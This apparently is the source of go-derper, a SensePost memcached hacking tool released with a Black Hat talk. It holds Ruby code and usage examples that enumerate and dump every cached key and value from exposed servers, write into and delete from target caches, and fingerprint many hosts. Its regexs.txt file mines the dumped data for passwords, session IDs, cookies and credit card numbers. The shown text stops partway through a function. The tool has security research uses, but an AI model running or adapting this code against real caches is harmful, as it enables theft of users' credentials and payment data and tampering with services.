├── cleanpage ├── regexs.txt ├── LICENSE.txt ├── memcache-client-license.txt ├── readme.old ├── README.markdown ├── memcacheex.rb ├── go-derper.rb └── memcache.rb /cleanpage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sensepost/go-derper/HEAD/cleanpage -------------------------------------------------------------------------------- /regexs.txt: -------------------------------------------------------------------------------- 1 | #IP Addresses 2 | ([1-2]?[0-9]?[0-9]\.[1-2]?[0-9]?[0-9]\.[1-2]?[0-9]?[0-9]\.[1-2]?[0-9]?[0-9]) 3 | #Credentials / tokens 4 | (pass.{1,50}) 5 | (user.{1,50}) 6 | (auth.{1,50}) 7 | #URLS 8 | (http[s]?://[-a-z0-9._@/?&=%:]+) 9 | (ftp://[a-z0-9.-_@/]+) 10 | #Session IDs 11 | (.{1,20}SESSION.{1,50}) 12 | #CC 13 | ([0-9]{4}[- .]?[0-9]{4}[- .]?[0-9]{4}[- .]?[0-9]{4}) 14 | (creditcard.{1,50}) 15 | (credit.?card.{1,50}) 16 | #Emails 17 | ([-a-z0-9_!]+@([-a-z0-9_]+\.)+(AC|AD|AE|AERO|AF|AG|AI|AL|AM|AN|AO|AQ|AR|ARPA|AS|ASIA|AT|AU|AW|AX|AZ|BA|BB|BD|BE|BF|BG|BH|BI|BIZ|BJ|BM|BN|BO|BR|BS|BT|BV|BW|BY|BZ|CAT|CA|CA|CC|CD|CF|CG|CH|CI|CK|CL|CM|CN|COM|CO|COOP|CR|CU|CV|CX|CY|CZ|DE|DJ|DK|DM|DO|DZ|EC|EDU|EE|EG|ER|ES|ET|EU|FI|FJ|FK|FM|FO|FR|GA|GB|GD|GE|GF|GG|GH|GI|GL|GM|GN|GOV|GP|GQ|GR|GS|GT|GU|GW|GY|HK|HM|HN|HR|HT|HU|ID|IE|IL|IM|INFO|INT|IN|IO|IQ|IR|IS|IT|JE|JM|JO|JOBS|JP|KE|KG|KH|KI|KM|KN|KP|KR|KW|KY|KZ|LA|LB|LC|LI|LK|LR|LS|LT|LU|LV|LY|MA|MC|MD|ME|MG|MH|MIL|MK|ML|MM|MN|MO|MOBI|MP|MQ|MR|MS|MTMUSEUM|MU||MV|MW|MX|MY|MZ||NAME|NA|NC|NE|NET|NF|NG|NI|NL|NO|NP|NR|NU|NZ|OM|ORG|PA|PE|PF|PG|PH|PK|PL|PM|PN|PR|PRO|PS|PT|PW|PY|QA|RE|RO|RS|RU|RW|SA|SB|SC|SD|SE|SG|SH|SI|SJ|SK|SL|SM|SN|SO|SR|ST|SU|SV|SY|SZ|TC|TD|TEL|TF|TG|TH|TJ|TK|TL|TM|TN|TO|TP|TR|TRAVEL|TT|TV|TW|TZ|UA|UG|UK|US|UY|UZ|VA|VC|VE|VG|VI|VN|VU|WF|WS|YE|YT|ZA|ZM|ZW)) 18 | #Cookies 19 | (cookie.{1,80}) 20 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2010, SensePost 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright 8 | notice, this list of conditions and the following disclaimer. 9 | * Redistributions in binary form must reproduce the above copyright 10 | notice, this list of conditions and the following disclaimer in the 11 | documentation and/or other materials provided with the distribution. 12 | * Neither the name of the nor the 13 | names of its contributors may be used to endorse or promote products 14 | derived from this software without specific prior written permission. 15 | 16 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 17 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 18 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 19 | DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY 20 | DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 21 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 22 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND 23 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 24 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 25 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 26 | -------------------------------------------------------------------------------- /memcache-client-license.txt: -------------------------------------------------------------------------------- 1 | Copyright 2005-2009 Bob Cottrell, Eric Hodel, Mike Perham. 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions 6 | are met: 7 | 8 | 1. Redistributions of source code must retain the above copyright 9 | notice, this list of conditions and the following disclaimer. 10 | 2. Redistributions in binary form must reproduce the above copyright 11 | notice, this list of conditions and the following disclaimer in the 12 | documentation and/or other materials provided with the distribution. 13 | 3. Neither the names of the authors nor the names of their contributors 14 | may be used to endorse or promote products derived from this software 15 | without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED BY THE AUTHORS ``AS IS'' AND ANY EXPRESS 18 | OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 19 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 20 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE 21 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, 22 | OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT 23 | OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR 24 | BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 25 | WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE 26 | OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, 27 | EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | 29 | -------------------------------------------------------------------------------- /readme.old: -------------------------------------------------------------------------------- 1 | (c) SensePost 2010 2 | 3 | License: BSD (See LICENSE.txt) 4 | 5 | ---------------------------------- 6 | go-derper.rb - marco@sensepost.com 7 | ---------------------------------- 8 | 9 | 1. Intro 10 | -------- 11 | 12 | Quick 'n dirty tool for extracting stuff from memcached servers, as well as for basic manipulations of the cache 13 | including monitoring various stats, writing into the cache and deleting entries. 14 | 15 | 2. Requirements 16 | --------------- 17 | 18 | - Ruby (Tested on 1.8.6) 19 | - memcache-client gem (gem install memcache-client) 20 | Note: we include a modified memcache.rb from memcache-client. Thus parts of this package 21 | are subject to their BSD license. See memcache-client-license.txt 22 | - disk space and bandwidth :) 23 | 24 | 3. Comman Usage Examples 25 | ----------------------- 26 | 27 | Extract contents of a cache (defaults to 10 keys per slab) 28 | ./go-derper.rb -l -s 29 | 30 | Extract contents of a cache, using 100 keys per slab 31 | ./go-derper.rb -l -K 100 -s 32 | 33 | Extract contents of a cache, using 100 keys per slab, print out values matching regexes found regexs.txt 34 | ./go-derper.rb -l -K 100 -s -R regexs.txt 35 | 36 | Write back into the cache, the value stored at output/run5-c4ecee795335e7ef662e661974699448 37 | ./go-derper.rb -w output/run5-c4ecee795335e7ef662e661974699448 38 | When writing values into the cache, local paths needs to be resolved. Run go-derper from inside it's 39 | own root. 40 | 41 | Delete the value stored at output/run5-c4ecee795335e7ef662e661974699448 42 | ./go-derper.rb -d output/run5-c4ecee795335e7ef662e661974699448 43 | When deleting values from the cache, local paths needs to be resolved. Run go-derper from inside it's 44 | own root. 45 | 46 | Pull stats from one cache: 47 | ./go-derper.rb -s -S 48 | 49 | Fingerprint multiple caches: 50 | ./go-derper.rb -f ,,..., 51 | 52 | Fingerprint multiple caches stored in a file (one per line): 53 | ./go-derper.rb -F 54 | 55 | Monitor a single cache to watch changes: 56 | ./go-derper.rb -m -s 57 | 58 | Pull a single key: 59 | ./go-derper.rb -k -s 60 | 61 | 4. More 62 | ------- 63 | 64 | www.sensepost.com 65 | -------------------------------------------------------------------------------- /README.markdown: -------------------------------------------------------------------------------- 1 | #1. Name 2 | go-derper - Memcache hacking tool 3 | #2. Author 4 | Marco Slaviero < marco(at)sensepost(dot)com > 5 | #3. License, version & release date 6 | License : BSD 7 | Version : v1.0 8 | Release Date : 2010 9 | 10 | #4. Description 11 | go-derper.rb is a tool for hacking memcached servers, released as part of our BlackHat USA. It uses elements of the memcached protocol to derive full lists of keys stored on the memcached server, and can therefore extract the contents of the cache. 12 | 13 | In addition, it also supports basic searching of retrieved data via user-configurable regular expressions, fingerprinting of multiple caches, monitoring usage in caches as well as basic cache content manipulations such as value insertion, overwrites and deletion. 14 | #5. Usage 15 | Extract contents of a cache (defaults to 10 keys per slab) 16 | > ./go-derper.rb -l -s < hostname > 17 | 18 | Extract contents of a cache, using 100 keys per slab 19 | > ./go-derper.rb -l -K 100 -s < hostname > 20 | 21 | Extract contents of a cache, using 100 keys per slab, print out values matching regexes found regexs.txt 22 | > ./go-derper.rb -l -K 100 -s < hostname > -R regexs.txt 23 | 24 | Write back into the cache, the value stored at output/run5-c4ecee795335e7ef662e661974699448 25 | > ./go-derper.rb -w output/run5-c4ecee795335e7ef662e661974699448 26 | When writing values into the cache, local paths needs to be resolved. Run go-derper from inside it's 27 | own root. 28 | 29 | Delete the value stored at output/run5-c4ecee795335e7ef662e661974699448 30 | > ./go-derper.rb -d output/run5-c4ecee795335e7ef662e661974699448 31 | When deleting values from the cache, local paths needs to be resolved. Run go-derper from inside it's 32 | own root. 33 | 34 | Pull stats from one cache: 35 | > ./go-derper.rb -s < hostname > -S 36 | 37 | Fingerprint multiple caches: 38 | > ./go-derper.rb -f < host1 >,< host2 >,...,< hostn > 39 | 40 | Fingerprint multiple caches stored in a file (one per line): 41 | > ./go-derper.rb -F < file > 42 | 43 | Monitor a single cache to watch changes: 44 | > ./go-derper.rb -m -s < hostname > 45 | 46 | Pull a single key: 47 | > ./go-derper.rb -k < keyid > -s < hostname > 48 | #6. Requirements 49 | - Ruby (Tested on 1.8.6) 50 | - memcache-client gem (gem install memcache-client) 51 | Note: we include a modified memcache.rb from memcache-client. Thus parts of this package 52 | are subject to their BSD license. See memcache-client-license.txt 53 | - disk space and bandwidth :) 54 | 55 | #7. Additional Resources 56 | Blog, BlackHat Write-up: go-derper and mining memcaches - http://www.sensepost.com/blog/4873.html 57 | -------------------------------------------------------------------------------- /memcacheex.rb: -------------------------------------------------------------------------------- 1 | require 'rubygems' 2 | require 'memcache' 3 | module Debug 4 | DEBUG=1 5 | VERBOSE=2 6 | INFO=3 7 | WARNING=4 8 | ERROR=5 9 | NONE=6 10 | @@minl = INFO 11 | 12 | def dbgprint(level, msg) 13 | if level >= @@minl then 14 | case level 15 | when DEBUG 16 | print "[d] " 17 | when VERBOSE 18 | print "[v] " 19 | when INFO 20 | print "[i] " 21 | when WARNING 22 | print "[w] " 23 | when ERROR 24 | print "[E] " 25 | end 26 | puts msg 27 | end 28 | end 29 | 30 | def dprint(msg) 31 | dbgprint(Debug::DEBUG, msg) 32 | end 33 | 34 | def vprint(msg) 35 | dbgprint(Debug::VERBOSE, msg) 36 | end 37 | 38 | def iprint(msg) 39 | dbgprint(Debug::INFO, msg) 40 | end 41 | 42 | def wprint(msg) 43 | dbgprint(Debug::WARNING, msg) 44 | end 45 | 46 | def eprint(msg, die=false) 47 | dbgprint(Debug::ERROR, msg) 48 | exit(1) if die 49 | end 50 | end 51 | include Debug 52 | 53 | class MemCacheEx < MemCache 54 | attr :version 55 | @caps = nil 56 | 57 | def slabs 58 | self.stats("slabs") 59 | end 60 | 61 | def settings 62 | self.stats("settings") 63 | end 64 | 65 | def items 66 | self.stats("items") 67 | end 68 | 69 | def caps 70 | @caps 71 | end 72 | 73 | 74 | 75 | def probe_stats_capabilities 76 | all_known_capabilities = [{""=>nil}, 77 | {"slabs"=>nil}, 78 | {"settings"=>nil}, 79 | {"items"=>nil}, 80 | {"tap"=>nil}, 81 | {"hash"=>nil}, 82 | {"vbucket"=>nil},#check is superfluous, as it requires further, unknown params 83 | {"key"=>nil},#check is superfluous, as it requires further, unknown params 84 | {"vkey"=>nil}]#check is superfluous, as it requires further, unknown params 85 | @caps = [] 86 | all_known_capabilities.each do |cap| 87 | c = cap.keys[0] 88 | args = cap[c] 89 | dprint("Testing for \"#{c}\"") 90 | begin 91 | self.stats(c+(args.nil? ? "":" "+args)) 92 | if c == "" then 93 | @caps << "(stat)" 94 | else 95 | @caps << c 96 | end 97 | rescue MemCache::MemCacheError 98 | dprint("\"#{c}\" not supported") 99 | end 100 | end 101 | begin 102 | self.set("TESTWRITEINTOTHECACHE_FROM_MEMCRASHED","yousaidyourdogdoesnotbitethatisnotmydog",0,true,123) 103 | @caps << "(set)" 104 | dprint("Successfully wrote into cache") 105 | rescue Exception => e 106 | iprint("Cannot set entries in the cache: #{e.to_s}") 107 | end 108 | begin 109 | flags,r = self.get("TESTWRITEINTOTHECACHE_FROM_MEMCRASHED",true) 110 | if r == "yousaidyourdogdoesnotbitethatisnotmydog" and flags == 123 then 111 | @caps << "(get)" 112 | dprint("Successfully pulled from the cache") 113 | else 114 | iprint("Retrieval opeation returned an unexpected value (#{r})") 115 | end 116 | rescue Exception => e 117 | iprint("Cannot get entries from cache: #{e.to_s}") 118 | end 119 | 120 | #@caps.each {|c| s+="#{c} "} 121 | vprint("Capabilities supported: #{@caps.collect{|c| "#{c} "}}") 122 | @caps 123 | end 124 | 125 | def debug_enable 126 | raise MemCacheError, "No active servers" unless active? 127 | 128 | complete=false 129 | @servers.each do |server| 130 | next unless server.alive? 131 | 132 | with_socket_management(server) do |socket| 133 | cmd = "stats detail on\r\n" 134 | socket.write cmd 135 | line = socket.gets 136 | raise_on_error_response! line 137 | complete=true 138 | end 139 | end 140 | 141 | raise MemCacheError, "No active servers" if !complete 142 | return true 143 | end 144 | 145 | def get_slabs_info 146 | #we pull two sets of slabs info from the cache, using "stats slabs" and "stats items" 147 | #data is merged into a single structure 148 | raise MemCacheError, "No active servers" unless active? 149 | dprint("Entered get_slabs_info") 150 | tmp_slabs_info = {} 151 | slabs=self.slabs 152 | slabs.keys.each do |server| 153 | dprint("get_slabs_info(): working on #{server}") 154 | slabs[server].keys.each do |i| 155 | dprint("get_slabs_info(): working on #{i}") 156 | (slabs_id,info_key) = i.split(/:/) 157 | info_value = slabs[server][i] 158 | next unless !slabs_id.nil? and !info_key.nil? and !info_value.nil? 159 | tmp_slabs_info[server] = {} if tmp_slabs_info[server].nil? 160 | tmp_slabs_info[server][slabs_id] = {} if tmp_slabs_info[server][slabs_id].nil? 161 | tmp_slabs_info[server][slabs_id][info_key] = info_value 162 | end 163 | end 164 | 165 | #now repeat, except this time pulling items stats. results format is every so slightly different 166 | #hence the dupped code 167 | slabs=self.items 168 | slabs.keys.each do |server| 169 | dprint("get_slabs_info(): working on #{server}") 170 | slabs[server].keys.each do |i| 171 | dprint("get_slabs_info(): working on #{i}") 172 | (not_used,slabs_id,info_key) = i.split(/:/) 173 | info_value = slabs[server][i] 174 | next unless !slabs_id.nil? and !info_key.nil? and !info_value.nil? 175 | tmp_slabs_info[server] = {} if tmp_slabs_info[server].nil? 176 | tmp_slabs_info[server][slabs_id] = {} if tmp_slabs_info[server][slabs_id].nil? 177 | tmp_slabs_info[server][slabs_id][info_key] = info_value 178 | end 179 | end 180 | 181 | tmp_slabs_info.keys.each {|s| 182 | tmp_slabs_info[s].keys.each {|sl| 183 | tmp_slabs_info[s][sl].keys.each {|info| 184 | dprint "#{s}:#{sl}:#{info}->#{tmp_slabs_info[s][sl][info]}" 185 | } 186 | } 187 | } 188 | 189 | tmp_slabs_info 190 | end 191 | 192 | 193 | def get_slabs_ids 194 | raise MemCacheError, "No active servers" unless active? 195 | #we deal with single servers at a time in a cache object, so we don't need to loop 196 | #through all possible servers (since there should be only one) 197 | slabs=get_slabs_info 198 | slabs.keys.each do |server| 199 | slabs[server]=slabs[server].keys 200 | end 201 | slabs 202 | end 203 | 204 | def get_keys(slabs_id, key_limit) 205 | raise MemCacheError, "No active servers" unless active? 206 | server_items = {} 207 | dprint("Entered get_keys(#{slabs_id},#{key_limit})") 208 | 209 | @servers.each do |server| 210 | next unless server.alive? 211 | dprint("Retrieving #{key_limit} keys from slabs #{slabs_id} on server #{server.host}") 212 | 213 | with_socket_management(server) do |socket| 214 | value = nil 215 | cmd = "stats cachedump #{slabs_id} #{key_limit}\r\n" 216 | 217 | socket.write cmd 218 | stats = {} 219 | while line = socket.gets do 220 | raise_on_error_response! line 221 | break if line == "END\r\n" 222 | if line =~ /ITEM ([\S]+) (\[.+\])/ then 223 | name, value = $1, $2 224 | stats[name] = value 225 | end 226 | end 227 | server_items["#{server.host}:#{server.port}"] = stats 228 | end 229 | end 230 | 231 | raise MemCacheError, "No active servers" if server_items.empty? 232 | server_items 233 | end 234 | 235 | def namespace=(namespace) 236 | @namespace = namespace 237 | end 238 | 239 | end 240 | -------------------------------------------------------------------------------- /go-derper.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'digest/sha1' 4 | require "getoptlong" 5 | #require 'rubygems' 6 | require 'memcacheex' 7 | require 'zlib' 8 | 9 | 10 | #while true do 11 | # key=(rand*100).to_i.to_s 12 | # value=(rand*10000).to_i.to_s 13 | # CACHE.set(key,value) 14 | #end 15 | 16 | 17 | class Console 18 | def Console.clear 19 | $stdout.write "#{27.chr}[2J" if @@minl >= INFO 20 | end 21 | end 22 | 23 | class Leacher 24 | @cache=nil 25 | attr :server_debug_configured 26 | 27 | def set_cache(cache) 28 | if !cache.nil? 29 | throw Exception.new("Object is not a MemCache") if cache.class != MemCache and cache.class != MemCacheEx 30 | @cache = cache 31 | end 32 | end 33 | 34 | 35 | def Leacher(cache=nil) 36 | set_cache(cache) 37 | self.server_debug_configured = true 38 | end 39 | 40 | def open(cache=nil) 41 | set_cache(cache) 42 | end 43 | 44 | def canleach? 45 | begin 46 | @cache.debug_enable 47 | server_debug_configured = true 48 | return true 49 | rescue MemCache::MemCacheError 50 | return false 51 | end 52 | end 53 | 54 | #leach will either try to fetch a key specified with -k, or determine keys through the debug functions 55 | def leach(slabs_to_retrieve,key_limit,requested_key,&block) 56 | servers = {} 57 | 58 | begin 59 | @cache.debug_enable if !self.server_debug_configured 60 | rescue MemCacheError 61 | eprint("Could not enable debug mode on server, can't leach.") 62 | return false 63 | end 64 | 65 | if !requested_key.nil? then 66 | dprint("Only fetch a single key, \"#{requested_key}\"") 67 | flags,val=@cache.get(requested_key,true) 68 | if val.nil? then 69 | eprint("No entry found") 70 | else 71 | yield -1, requested_key.dup, flags, val.dup 72 | end 73 | return 74 | end 75 | 76 | if slabs_to_retrieve.nil? or slabs_to_retrieve == "" 77 | servers = @cache.get_slabs_ids 78 | else 79 | servers[@cache.servers[0].host+":"+@cache.servers[0].port.to_s] = [slabs_to_retrieve.to_i] 80 | end 81 | 82 | dprint("Starting to leach") 83 | servers.each do |server,slabs| 84 | slabs.each do |slabs_id| 85 | slabs_id = slabs_id.to_i if !slabs_id.is_a?(Integer) 86 | throw Exception.new("Slabs id (#{slabs_id.to_s}) must be an integer >= 0") if (!slabs_id.is_a?(Integer) or !(slabs_id > 0)) 87 | dprint("Leach on slabs #{slabs_id}") 88 | ret=@cache.get_keys(slabs_id, key_limit) 89 | ret=ret[ret.keys[0]] 90 | 91 | @cache.namespace = nil 92 | 93 | ret.keys.each do |key_id| 94 | #if (key_id =~ /(\S+):(\S+)/) then 95 | # @cache.namespace, key_id = $1, $2 96 | #else 97 | #end 98 | flags,val=@cache.get(key_id, true) 99 | dprint("#{key_id} -> #{val}") 100 | val = "(nil)" if val.nil? 101 | yield slabs_id, key_id.dup, flags, val.dup 102 | end 103 | end 104 | end 105 | end 106 | end 107 | 108 | class Stats 109 | @stats=nil 110 | @cache=nil 111 | @@header_printed=false 112 | 113 | def refresh_cache(submenu=nil) 114 | @stats = @cache.stats(submenu).shift[1] if !@cache.nil? 115 | throw Exception.new("stats request for #{submenu} returned nil") if @stats.nil? 116 | @stats 117 | end 118 | 119 | def set_cache(cache) 120 | if !cache.nil? 121 | throw Exception.new("Object (#{cache.class}) is not a MemCache") if !cache.is_a?(MemCache) or !cache.is_a?(MemCacheEx) 122 | 123 | throw Exception.new("Stats for #{cache.stats.length.to_i} servers found, except I'm expecting only 1") if cache.stats.length != 1 124 | 125 | @cache = cache 126 | 127 | refresh_cache 128 | end 129 | end 130 | 131 | def Stats(cache=nil) 132 | set_cache(cache) 133 | end 134 | 135 | def Stats(server, port, namespace) 136 | set_cache(MemCache.new(server+":"+port,:namespace => namespace)) 137 | end 138 | 139 | def open(cache=nil) 140 | if @stats.nil? 141 | if cache.nil? 142 | Exception.new("No stored or supplied cache object") 143 | else 144 | set_cache(cache) 145 | end 146 | end 147 | end 148 | 149 | def method_missing(meth) 150 | throw Exception.new("No cache object") if @stats.nil? 151 | refresh_cache 152 | 153 | throw NoMethodError.new("undefined method `#{meth.id2name}'") if @stats[meth.id2name].nil? 154 | @stats[meth.id2name] 155 | end 156 | 157 | def get_field(field) 158 | throw Exception.new("No cache object") if @stats.nil? 159 | 160 | return all_fields if field == "all" 161 | 162 | throw Exception.new("No such field #{field}") if @stats[field].nil? 163 | @stats[field] 164 | end 165 | 166 | def all_fields 167 | throw Exception.new("No cache object") if @stats.nil? 168 | str="" 169 | @stats.keys.sort.each {|k| str+= "#{k} -> #{@stats[k]}\n"} 170 | str 171 | end 172 | 173 | def print_all_fields 174 | throw Exception.new("No cache object") if @stats.nil? 175 | @stats.keys.sort.each do |k| 176 | dbgprint INFO, "#{k} -> #{@stats[k]}" 177 | end 178 | end 179 | 180 | @@lengths={:k=>0,:c=>0,:p=>0,:r=>0,:t=>0,:m=>0} 181 | def print_monitored_data data 182 | keys = data[:base].keys.sort 183 | 184 | t_time = data[:total_elapsed_time] 185 | p_time = data[:poll_elapsed_time] 186 | 187 | l=@@lengths 188 | 189 | Console.clear 190 | 191 | puts "Monitoring memcached on #{@cache.servers[0].host}:#{@cache.servers[0].port}, monitor uptime is #{"%.2fs" %data[:total_elapsed_time]}\n\n" 192 | keys.each do |k| 193 | #puts "#{k}: prev change #{data[:changed][k]} in #{"%.2f" % t} s, running totals #{data[:running][k]}, total movement #{data[:base][k]} ("+ ("%.2f" % (data[:base][k].to_f/t)) +"/s)" 194 | l[:k] = k.length+1 if k.length>l[:k] 195 | c="current #{data[:current][k]}" 196 | l[:c] = c.length+1 if c.length>l[:c] 197 | p="prev change #{data[:changed][k]} in #{"%.2f" % p_time}s" 198 | l[:p] = p.length+1 if p.length>l[:p] 199 | r="running totals #{data[:running][k]}"# (avg #{"%.2f" % (data[:running][k].to_f/p_time)} chgs/s)" 200 | l[:r] = r.length+1 if r.length>l[:r] 201 | t="total movement #{data[:base][k]} ("+ ("%.2f" % (data[:base][k].to_f/t_time)) +"/s)" 202 | l[:t] = t.length+1 if t.length>l[:t] 203 | m="biggest movement #{data[:movers][k][:move]} ("+ ("%.2f" % (Time.now-data[:movers][k][:time_distance]).to_f) +"s ago)" 204 | l[:m] = m.length+1 if m.length>l[:m] 205 | 206 | printf "%-#{l[:k]}s: %-#{l[:c]}s %-#{l[:p]}s %-#{l[:r]}s %-#{l[:t]}s %-#{l[:m]}s\n", k, c, p, r, t, m 207 | end 208 | 209 | end 210 | 211 | def monitor(limit,submenu,gap) 212 | dprint "Entered #{caller(0)[0]}" 213 | #we'll track every key that changed in the course of monitoring, not just singe the last poll 214 | changed_keys=[] 215 | base_measure=refresh_cache(submenu).dup 216 | running_totals={} 217 | changed_totals=nil 218 | dprint "Base measure obtained" 219 | base_time=Time.now 220 | first_time=nil 221 | poll_time=nil 222 | biggest_movers={} 223 | 224 | first_measure=refresh_cache(submenu).dup 225 | while limit >= 0 226 | first_time = Time.now 227 | sleep(gap) 228 | poll_measure=refresh_cache(submenu).dup 229 | poll_time=Time.now 230 | total_elapsed_time = poll_time - base_time 231 | poll_elapsed_time = poll_time - first_time 232 | 233 | dprint "Poll measure obtained" 234 | 235 | changed_totals={} 236 | base_measure.keys.sort.each do |k| 237 | begin 238 | Integer(base_measure[k]) 239 | Integer(first_measure[k]) 240 | Integer(poll_measure[k]) 241 | diff=poll_measure[k].to_i-first_measure[k].to_i 242 | next if diff == 0 243 | changed_keys<0, :move=>0} if biggest_movers[k].nil? 249 | if diff.abs > biggest_movers[k][:move].abs then 250 | biggest_movers[k][:time_distance]=poll_time 251 | biggest_movers[k][:move]=diff 252 | end 253 | 254 | 255 | dprint "#{k}: #{diff} (#{diff.to_f/poll_elapsed_time} changes/sec)" 256 | rescue ArgumentError 257 | end 258 | end 259 | 260 | monitored_data={:total_elapsed_time => total_elapsed_time, :poll_elapsed_time => poll_elapsed_time,:current=>{},:base =>{},:running=>{},:changed=>{},:movers=>{}} 261 | changed_keys.each do |k| 262 | throw Exception.new("Unexpected absent key #{k}") if base_measure[k].nil? or poll_measure[k].nil? 263 | monitored_data[:current][k] = poll_measure[k].to_i 264 | monitored_data[:base][k] = (poll_measure[k].to_i-base_measure[k].to_i).to_f 265 | monitored_data[:running][k] = running_totals[k].to_f 266 | monitored_data[:changed][k] = changed_totals[k] 267 | monitored_data[:movers][k] = biggest_movers[k] 268 | 269 | end 270 | 271 | print_monitored_data monitored_data 272 | 273 | if limit == 1 274 | limit -= 2 275 | elsif limit > 0 276 | limit -= 1 277 | end 278 | 279 | first_measure=poll_measure 280 | end 281 | dprint "Left #{caller(0)[0]}" 282 | end 283 | 284 | def pretty_time(t) 285 | return if t.nil? 286 | #arb constant to separate sec-since-epoch from plain seconds counts 287 | if t > 1050000000 then 288 | return Time.at(t).to_s 289 | end 290 | 291 | s="" 292 | sec=0 293 | min=0 294 | hour=0 295 | day=0 296 | t=t.to_f 297 | 298 | if t / (24 * 3600) >= 1 then 299 | day=(t / (24 * 3600)).floor 300 | t-=day*(24*3600) 301 | end 302 | if t / (3600) >= 1 then 303 | hour=(t / (3600)).floor 304 | t-=hour*(3600) 305 | end 306 | if t / (60) >= 1 then 307 | min=(t / (60)).floor 308 | t-=min*(60) 309 | end 310 | sec=t 311 | 312 | sprintf("%i:%02i:%02i:%02i",day,hour,min,sec) 313 | end 314 | 315 | def pretty_num(m) 316 | return if m.nil? 317 | if m > 10**12 318 | return sprintf("%.2ft",m.to_f/10**12) 319 | elsif m > 10**9 320 | return sprintf("%.2fb",m.to_f/10**9) 321 | elsif m > 10**6 322 | return sprintf("%.2fm",m.to_f/10**6) 323 | elsif m > 10**3 324 | return sprintf("%.2fk",m.to_f/10**3) 325 | else 326 | return sprintf("%i",m) 327 | end 328 | end 329 | 330 | def pretty_mem(m) 331 | return if m.nil? 332 | if m > 2**40 333 | return sprintf("%.2f TB",m.to_f/2**40) 334 | elsif m > 2**30 335 | return sprintf("%.2f GB",m.to_f/2**30) 336 | elsif m > 2**20 337 | return sprintf("%.2f MB",m.to_f/2**20) 338 | elsif m > 2**10 339 | return sprintf("%.2f KB",m.to_f/2**10) 340 | else 341 | return sprintf("%i B",m) 342 | end 343 | end 344 | 345 | def print_fingerprint(fp,output_format) 346 | #puts "\n\n#{@cache.servers[0].host}:#{@cache.servers[0].port}\n==============================" 347 | if @@header_printed == true then 348 | dprint("@@header_printed = true") 349 | elsif @@header_printed == false then 350 | dprint("@@header_printed = false") 351 | else 352 | dprint("@@header_printed = "+@@header_printed) 353 | end 354 | 355 | if output_format == "csv" then 356 | if @@header_printed == false then 357 | puts "Host,Version,PID,Uptime,Systime,Utime,Stime,Max Bytes,Max Item Size,Current Connections,Net Bytes Read,Net Bytes Written,Get Count,Set Count,Bytes Stored,Item Count,Total Items,Total Slabs,Stats Capabilities" 358 | @@header_printed = true 359 | end 360 | puts "#{@cache.servers[0].host}:#{@cache.servers[0].port},#{fp[:runenv][:version]},#{fp[:runenv][:pid]},"+pretty_time(fp[:runenv][:uptime])+","+pretty_time(fp[:runenv][:time])+",#{"%.2f" % fp[:runenv][:rusage_user]},#{"%.2f" % fp[:runenv][:rusage_system]},#{fp[:memory][:maxbytes]},#{fp[:memory][:item_size_max]},#{fp[:runenv][:curr_connections]},#{fp[:network][:bytes_read]},#{fp[:network][:bytes_written]},#{fp[:cache][:cmd_get]},#{fp[:cache][:cmd_set]},#{fp[:cache][:bytes]},#{fp[:cache][:curr_items]},#{fp[:cache][:total_items]},#{fp[:cache][:total_slabs]},#{fp[:runenv][:capabilities].join(" ")}" 361 | elsif output_format == "multiline" then 362 | puts "#{@cache.servers[0].host}:#{@cache.servers[0].port}\n==============================" 363 | 364 | puts "memcached #{fp[:runenv][:version]} (#{fp[:runenv][:pid]}) up "+pretty_time(fp[:runenv][:uptime])+", sys time "+pretty_time(fp[:runenv][:time])+", utime=#{"%.2f" % fp[:runenv][:rusage_user]}, stime=#{"%.2f" % fp[:runenv][:rusage_system]}" 365 | puts "Mem: Max #{pretty_mem(fp[:memory][:maxbytes])}, max item size = #{pretty_mem(fp[:memory][:item_size_max])}" 366 | puts "Network: curr conn #{fp[:runenv][:curr_connections]}, bytes read #{pretty_mem(fp[:network][:bytes_read])}, bytes written #{pretty_mem(fp[:network][:bytes_written])}" 367 | puts "Cache: get #{pretty_num(fp[:cache][:cmd_get])}, set #{pretty_num(fp[:cache][:cmd_set])}, bytes stored #{pretty_mem(fp[:cache][:bytes])}, curr item count #{pretty_num(fp[:cache][:curr_items])}, total items #{pretty_num(fp[:cache][:total_items])}, total slabs 